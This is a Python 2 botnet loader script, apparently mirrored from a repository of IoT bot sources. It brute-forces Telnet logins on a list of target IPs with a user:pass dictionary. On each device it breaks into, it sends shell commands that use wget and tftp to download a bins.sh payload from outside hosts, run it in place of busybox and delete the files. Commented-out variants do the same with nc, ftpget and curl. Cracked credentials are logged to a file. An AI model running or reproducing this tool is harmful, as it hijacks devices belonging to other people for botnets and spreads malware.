mirror of
https://github.com/threatland/TL-BOTS
synced 2024-06-29 18:31:41 +00:00
145 lines
5.1 KiB
Python
145 lines
5.1 KiB
Python
#!/usr/bin/env python
|
|
#
|
|
#
|
|
# I didnt really check for back doors so please be careful
|
|
#
|
|
#
|
|
#
|
|
from Queue import *
|
|
from sys import stdout
|
|
import threading, sys, time, random, socket, re, os, logging
|
|
if len(sys.argv) < 5:
|
|
print "Example: python %s targets.txt dictionary.txt <threads(1-100)> <ips per scan(100-1000)>" % (str(sys.argv[0]))
|
|
print "Dictionary should be in user:pass format"
|
|
sys.exit(1)
|
|
|
|
print "\x1b[1;32m***********************\x1b[1;35m"
|
|
print "\x1b[1;32m* YAAAAAAAAAAAAAAAAAA *\x1b[1;35m"
|
|
print "\x1b[1;32m***********************\x1b[1;35m"
|
|
|
|
#ip=sys.argv[1]
|
|
filename=sys.argv[2]
|
|
threads = int(sys.argv[3])
|
|
h0h0 = int(sys.argv[4])
|
|
ips = open(sys.argv[1], "r").readlines()
|
|
queue = Queue()
|
|
qcount = 0
|
|
|
|
#cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; wget http://kimuuk.tk/bins/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper
|
|
wget = "cd /tmp || cd /var || cd /dev/shm || cd /var/tmp || cd /root || cd /; wget http://dfvfeuv.tk/bins/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
|
|
#echo = "cd /var/; rm -rf busybox filename; rm -rf busybox armv4l.sh; echo -ne 'GET /armv4l.sh HTTP/1.0\r\nHost: 46.166.185.159\r\n\r\n' | nc 46.166.185.159 80 > armv4l.sh; chmod +x *; sed -i 1,9d armv4l.sh; cp /bin/busybox ./; busybox cat armv4l.sh > armv4l.sh; chmod +x armv4l.sh; ./armv4l.sh; rm -rf busybox armv4l.sh;"
|
|
tftp1 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp 46.166.185.159 -c get bins.sh; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
|
|
tftp2 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp -r bins.sh -g 46.166.185.159; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
|
|
#ftpget = "cd /var/; rm -rf armv4l; ftpget -v -u anonymous -p anonymous -P 21 46.166.185.159 armv4l armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
|
|
#curl = "cd /var/; rm -rf armv4l; curl -O http://kimuuk.tk/bins/armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
|
|
|
|
for ip in ips:
|
|
qcount += 1
|
|
stdout.write("\r[%d] Added to queue" % qcount)
|
|
stdout.flush()
|
|
queue.put(ip)
|
|
print "\n"
|
|
|
|
def readUntil(tn, string, timeout=20):
|
|
buf = ''
|
|
start_time = time.time()
|
|
while time.time() - start_time < timeout:
|
|
buf += tn.recv(1024)
|
|
time.sleep(0.01)
|
|
if string in buf: return buf
|
|
#raise Exception('TIMEOUT!')
|
|
|
|
def worker():
|
|
try:
|
|
while True:
|
|
try:
|
|
if queue.empty() == True:
|
|
sys.exit(1)
|
|
iplist = []
|
|
h0h0h0 = h0h0 + 1
|
|
#print "\033[33mGathering IPs\033[37m"%(ip.rstrip("\n"))
|
|
for x in xrange(h0h0h0):
|
|
ip = queue.get()
|
|
iplist.append(ip)
|
|
#print "\033[33mIP Address Obtained \033[32m%s\033[37m"%(ip.rstrip("\n"))
|
|
queue.task_done()
|
|
time.sleep(1.5)
|
|
for ip in iplist:
|
|
t = threading.Thread(target=ipthread, args=(ip.rstrip(),"null"))
|
|
t.start()
|
|
time.sleep(0.009)
|
|
time.sleep(1)
|
|
#print "\033[32mStarting Telnet Threads\033[37m"
|
|
except:
|
|
print "\033[31mWORKER ERROR\033[37m" #will fuk up if more threads/workers then ips in list
|
|
pass
|
|
except:
|
|
pass
|
|
|
|
|
|
def attempt(IP,UserName,Password):
|
|
try:
|
|
ip=IP
|
|
username=UserName
|
|
password=Password
|
|
tn = socket.socket()
|
|
tn.settimeout(5)
|
|
tn.connect((IP, 23))
|
|
#except Exception:
|
|
#print "[%s] Timeout"%(count)
|
|
#try:
|
|
time.sleep(0.01)
|
|
hoho = ''
|
|
hoho += readUntil(tn, ":")
|
|
if "ogin" in hoho or "sername" in hoho:
|
|
tn.send(UserName + "\n")
|
|
except Exception:
|
|
tn.close()
|
|
try:
|
|
hoho = ''
|
|
hoho += readUntil(tn, ":")
|
|
if "assword" in hoho:
|
|
tn.send(Password + "\n")
|
|
tn.send("wget\n")
|
|
tn.send("tftp\n")
|
|
tn.send("ifconfig\n")
|
|
time.sleep(3)
|
|
except Exception:
|
|
tn.close()
|
|
try:
|
|
mp = ''
|
|
mp += tn.recv(1024)
|
|
#if "#" in mp or "$" in mp or "@" in mp or ">" in mp:
|
|
if "addr" in mp or "Usage" in mp or "wget:" in mp or "tftp:" in mp or "ifconfig:" in mp or "@" in mp:
|
|
tn.send(wget + "\n")
|
|
#tn.send(echo + "\n")
|
|
tn.send(tftp1 + "\n")
|
|
tn.send(tftp2 + "\n")
|
|
#tn.send(ftpget + "\n")
|
|
#tn.send(curl + "\n")
|
|
print '\x1b[1;32mFound \x1b[1;31m '+IP+':23 \x1b[1;35m'+UserName+':\x1b[1;36m'+Password+'\x1b[1;33m'
|
|
f = open('session.txt', 'a')
|
|
f.write("%s:23 %s:%s\n" % (IP, UserName, Password))
|
|
f.close()
|
|
time.sleep(15)
|
|
tn.close()
|
|
except Exception:
|
|
tn.close()
|
|
|
|
def ipthread(ip,null):
|
|
fd = open(filename, "r")
|
|
for line in fd.readlines():
|
|
username, password = line.strip().split(":")
|
|
t = threading.Thread(target=attempt, args=(ip,username,password))
|
|
t.start()
|
|
time.sleep(0.3)
|
|
fd.close()
|
|
|
|
for g in xrange(threads):
|
|
t = threading.Thread(target=worker)
|
|
t.setDaemon(True)
|
|
t.start()
|
|
time.sleep(0.001)
|
|
|
|
queue.join()
|
|
print "Finished!" |